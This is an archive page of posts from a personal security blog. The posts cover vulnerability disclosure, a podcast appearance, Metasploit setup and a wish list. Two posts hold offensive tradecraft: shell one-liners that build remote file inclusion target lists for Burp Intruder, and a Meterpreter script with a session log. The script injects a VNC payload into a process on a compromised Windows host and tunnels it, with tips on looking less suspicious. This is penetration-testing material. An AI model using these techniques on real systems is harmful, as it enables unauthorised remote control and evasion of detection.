Room362.com

Blatherings of a security addict.

Vuln Disclosure Summarized

| Comments

I have an admittedly limited view of the exploit dev world. However, from what I’ve seen devs have very few options: (Please correct me if I’m wrong)

Responsible Disclosure

  • Direct Contact => depending on the size of the vendor and their view on security, this could result in anything from a simple thanks, a reward, to a court hearing.
  • Exploit Broker => possibly sell, possibly not, depends on the broker. The vuln could die on the table or stolen due to too much information being given during negotiations. This route has the same financial risk as direct contact, but a lot less risk of getting sued.
  • ZDI (or other vuln clearing house) => “instant” cash, but admittedly less than an Exploit Broker could possible get based on the financial risk to ZDI. Close to zero risk of court time (they may come after you for selling the exploit). And a lot less financial risk since (IIRC) they pay up front. But then the vulns go to also undisclosed parties, potentially the highest bidder which is probably not the vendor.
  • “other” secretive groups who share vulns for different reasons…
  • Just to friends => No cash, no judicial risk, but you do risk them stealing/selling your exploit.

Full Disclosure

  • Posting it to the web for all to see/user => Possible court time, but the definite upside is the vendor is forced to react. A very quick way to make enemies.
  • Releasing at a conference => Probable court time.

No Disclosure

  • Keeping it to yourself => Working under the assumption that your the only one that has found that same bug is still semi relevant due to the incredibly small size of the exploit dev community. However, as Dave said, they’ll be toasting to their sleeping dead 0days some day.

No More Free Bugs

  • My stance on this is split, while I think people should get paid for their work, I relate this movement to mowing someone’s lawn and then ringing their doorbell and asking for money. However I’m sure Robert Graham’s punch in the face metaphor also works.

Like, I have stated above, I am far and away a newbie to the vuln disclosure world and this debate has been going on since before I owned my own computer, but with the brilliant minds working at it, why doesn’t anyone offer up a solid solution to it?

My solution? Create a standard, something that we all abide by. I know as hackers we rebel against such things but in the interest of getting better security out there (yes, that’s what we are here for right?…. right?) we should should really work together on this. What sounds right?

I mean, what is the right way to approach someone who’s lawn you’ve mowed for the work you have done? Maybe free for open source projects, and a price based on exploitability and market share of the affected product?

Reference:

Vuln Trading Markets and You by Michal Zalewski (lcamtuf):
=> http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html

Vuln Disclosure is Rude by Robert Graham:
=> http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html

No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino Dai Zovi:
=> http://trailofbits.com/2009/03/22/no-more-free-bugs/

Dailydave Post by Dave Aitel:
=> http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html

Practical Exploitation

| Comments

Practical Exploitation is going to be me, explaining things in the way that I see the world on the best medium for what I’m explaining, be it a short blog blurb, a video of me, a video of a desktop, or just audio. There is no schedule that I’ll be sticking to, but I will guarantee you 3 things though:

  1. If you want it explained and it has to do with infosec or hacking (I’ll do my best on the hardware side), it will be on the show. Be it a white paper that you don’t have time or want to decrypt, a tool you can’t figure out, or just something you want to learn more in-depth. That’s what it’s for.
  2. No fluff, I’ll get straight to how you use it or can understand the topic.
  3. If your bullshit flag goes up for even an instant, call me on it, and I’ll either explain why I said what I did, or apologize and correct myself. You can email, tweet, PM, IM, ask a question on the tumblr site, or just haul up and punch me at a con. Either way, please take the time to tell me I’m wrong and why.

It launches today. I’ll start with topics that I know cold, I’ll move on to white papers that I thought were interesting but haven’t read yet, hopefully intermingling in anything you want to learn about.

http://www.practicalexploitation.com/

and email: questions at the same domain.

or call: (503) 406-8249

P.S. Room362.com and Mubix Links aren’t going anywhere. If anything they will probably start getting updated more. Room362 with stuff I cook up, as always, and Mubix Links with anything I find interesting on the web.

@RSnake ’s RFI List in Burp Suite

| Comments

First of all, get Robert @RSnake Hansen’s RFI list here:

http://ha.ckers.org/blog/20100129/large-list-of-rfis-1000/

it’s a great list, but as soon as I saw it, I was like.. hmm.. how can I use that? Well, being that I am a Burp fan, I parsed the .dat with the following line:

1
cat rfi-locations.dat | grep -v "^#" | awk -F '?' '{print $1}' | sort -u > rsnake_list.txt

This pulls his list down to 906 entries which you can load in to Burp and hammer away with Intruder. If it pops any of them, not only have you better identified what is running on the site, but you might have just found RFI.

But I wanted to take this a step further:

The OSVDB archive allows you to download their entire database of vulnerabilities (after signing up for an account). I downloaded the CSV version so that I could parse it similar to how I did RSnakes. However, it definitely wasn’t that easy.

I downloaded osvd-csv.latest.tar.gz, extracted it and ran the following:

1
cat * | grep -i "remote file inclusion" | grep -v ",0$" | awk -F "," '{print $13}' | sed 's/^"//' | set 's/"$//' | sort -u > osvdb_rfi.txt

Which got me close. About 3 hours of manual editing after that and I had another list of ~1750 possible remote file inclusions. Is this a full proof way of getting every possibility from the database? Definitely not, but it’s close, and I’d love to see some one modify and tweak my bash line to get it even closer. (Or find a completely different way)

Update on 2010-02-01 14:17 by Rob Fuller

RSnake has updated his list, same link, same file name with about 2300 RFIs now.

Security (CAN BE) an ART Not a SCIENCE

| Comments

This is far from a new idea, however it’s not something that is easily provable. So I had an idea this morning. I posed the following question on Twitter:

You know what I got in return? a resounding “No” from everyone. (well I had one outlier but, who doesn’t when you are trying to apply science to prove art) I challenge you to name another non-artistic career that people are so passionate about that they would stay in it even if they won the lottery.

Here are a few that I would like to highlight:

@schuetzdj

@TomSellers

@ethicalhack3r

@dookie2000ca

This was a somewhat surprising outcome. See a trend? Most people wanted to quit their jobs, and start their own infosec company. Why is this? Is it just “The American Dream” or is it because they are unhappy with the current people in leadership? Or is it simply the fact that they are hindered from actually pursuing and learning hacking/security at work? The world may never know, but I do implore firms to look at the retention rate of their actual talent. (No, I don’t buy into the No Infosec Peep left behind bull).

There is a rumor that Google has a practice. 2 hours a day, you (an employee of Google) are REQUIRED to work on a project of your own, that is in no way indebted or owned by Google, even after completion. I can imagine the above answers would change if that were the case where they worked. If their employers fostered learning.

As a result of Infosec / Hacking being an art, do we have our premadonas? Of course. But do we also have our Van Gogh’s and Michelangelo’s? Definitely.

But, time for a bit of a reality check:

@daveshackleford

Ya, you have NO idea what you would really do with millions of instant cash. I think the number is some 80% of lottery winners go BANKRUPT in the first 10 years. This is because you, and EVERYONE you have ANY connection to, goes absolutely crazy. To the point that there are lottery winner support groups.

However, the fact that people say it now, shows that they at least have the passion for the art. (or are just fronting)

Here some honest answers to even out the tide:

@shmoosr

@Bolster

@andrewsmhay

In conclusion, I believe that hacking is a science, until passion adds the artistic fire to the mix. At least that’s what I think, draw your own conclusions.

(That’s another thing I love about this field, you are constantly challenged to draw your own conclusions, to think, to learn, to improve, to be… better)

Grmn00bs Podcast

| Comments

I was recently on the grmn00bs podcast, I had a great time, and I can’t wait to see who they pick up next on their series:

grmn00bs podcast: episode 9

Update Archive.org Link

“When they were n00bs Series”

Show Notes:

  • hak5 is one of the original security shows. Rob has been featured on several segments.
  • Twit Netcast Network with Leo Laporte is another show that’s been around for a while.
  • Security Tube is the Youtube of security videos. This is where I’m at when I should be working. You might even find some GRM n00bs stuff rattling around there.
  • The Academy Pro is another excellent place to go for security training.
  • milw0rm has lots of exploits. It’s a good place to check out some old papers to brush up on security history.
  • NewOrder is another resource to get abreast of lessons learned in the past.
  • Jasager is the “Yes Man” Rob talks about in the show.
  • Chris Gates’s book list has some good ideas for security reading.
  • Syngress is a publisher of security texts. They have all my money.

Donate to Johnny Long!

Linked in to Twitter

| Comments

If you hadn’t noticed, LinkedIn has started allowing you to link your Twitter account to your LinkedIn account. So, I didn’t know this (since I opted out), but apparently LinkedIn will kick your status updates to Twitter… like when you get a new job…

Privacy settings out the window! Woohoo for Web 2.0!

Meterpreter Tunneling and VNC Revamped

| Comments

So yesterday (December 14th, 2009) HD Moore posted a tweet with a pic of the new VNC meterpreter script that he wrote:

Looking at the script I noticed that it created a new connection (two connections outbound). Well it was the perfect excuse to take the newly refurbished portfwd command for a spin.

https://github.com/mubix/stuff/blob/master/metasploit/vnc_oneport.rb

Or you can get it via the SVN at Revision 7872

By creating a bind payload instead of a reverse connect we can have the payload listen locally. Then with portfwd command (just like on your home router) we forward a local port to the local host on the remote side, to the binded port. Connecting to the freshly bound port as if we were actually doing everything on the box itself. Creating a new session and a nice beautiful VNC window.

Options:

1
2
3
4
5
6
7
8
9
meterpreter > run vnc_oneport -h

OPTIONS:  
-e <opt> The process to run and inject into (default: notepad.exe)  
-h  This help menu  
-l <opt> The local port to listen on via port forwarding (default: 5901)  
-p <opt> The port on the remote host to bind VNC to (default: randomized)

meterpreter >

Example Run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)

meterpreter > **_run vnc_oneport_**
[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207
[*] Host process notepad.exe has PID 532
[*] Allocated memory at address 0x00640000
[*] Writing the VNC stager into memory...
[*] Running Payload
[*] Creating a new thread within notepad.exe to run the VNC stager...
[*] Starting the port forwarding from 5901 => TARGET:1207
[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207

meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)
Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called
[*] VNC Server session 2 closed.
meterpreter >
[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)  
meterpreter > run vnc_oneport  
[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207  
[*] Host process notepad.exe has PID 532  
[*] Allocated memory at address 0x00640000  
[*] Writing the VNC stager into memory...  
[*] Running Payload  
[*] Creating a new thread within notepad.exe to run the VNC stager...  
[*] Starting the port forwarding from 5901 => TARGET:1207  
[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207  
meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)  
Connected to RFB server, using protocol version 3.3  
No authentication needed  
Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0  
Using default colormap which is TrueColor.  Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0  
Using shared memory PutImageSame machine: preferring raw encodingShmCleanup called  
[*] VNC Server session 2 closed.

meterpreter >

Note:

The forwarded port does not close even if the meterpreter session is ended, so use the following command to close the forward:

“` meterpreter > portfwd delete -l 5901
[*] Successfully stopped TCP relay on 0.0.0.0:5901 meterpreter >

(Note to BT4 users: do a apt-get install vncviewer before using any of the vnc payloads in Metasploit)

The script utilizes just one of the millions of way you can leverage ‘portfwd’ in your endeavors. But where it gets interesting is the fact that the delivery method for the payload never touches disk. That magic is all credited to HD though. What happens is a new process is created (notepad by default) and the newly created VNC bind payload is injected into it. But, the beauty is that it’s doing local connections via the port forwarding so all you see in TCPView is:

Now it’s definitely suspicious that Notepad has any connections at all, but you can use the option -e to provide any executable you wish, as long as it’s in the path for the system. For examples, look at what’s running naturally already.

Plus, you would probably not be using port 4444 for a meterpreter session. But what I wanted to demonstrate with this script is the power of both meterpreter, and port forwarding.

Now it’s your turn to make it better. Take a look at the guts, see if anything will help you in your scripting.

Metasploit With Ruby 1.9.1

| Comments

UPDATE: if you don’t make some additional steps, the ‘rvm 1.9.1’ command only is active for the current console session. See the site for details: http://rvm.beginrescueend.com/

This short tutorial is how to get Ruby 1.9.1 on BT4 or any other Linux distro with the tool ‘rvm’ (Ruby Version Manager).

The Metasploit team has put a lot of work into getting the framework to work well with 1.9.1 and still work with earlier versions. Here is a way that you can try out the new hotness, or just test to see if all of the tweaks and modules you run, work with the newer version of ruby.

Metasploit with Ruby 1.9.1 from mubix on Vimeo.

Update on 2009-12-10 14:19 by Rob Fuller

I’ve replaced my video with a short shell script:

1
2
3
4
5
6
#!/bin/bash

gem install rvm
rvm-install
rvm install 1.9.1
rvm 1.9.1

2009 Geek Christmas List

| Comments

What’s on your list? Here is mine (in no particular order):

Number 1: iPhone compatible alarm clock with good sound

Number 2: iPhone car mount that charges and is compatible with aux cables

What’s on your list?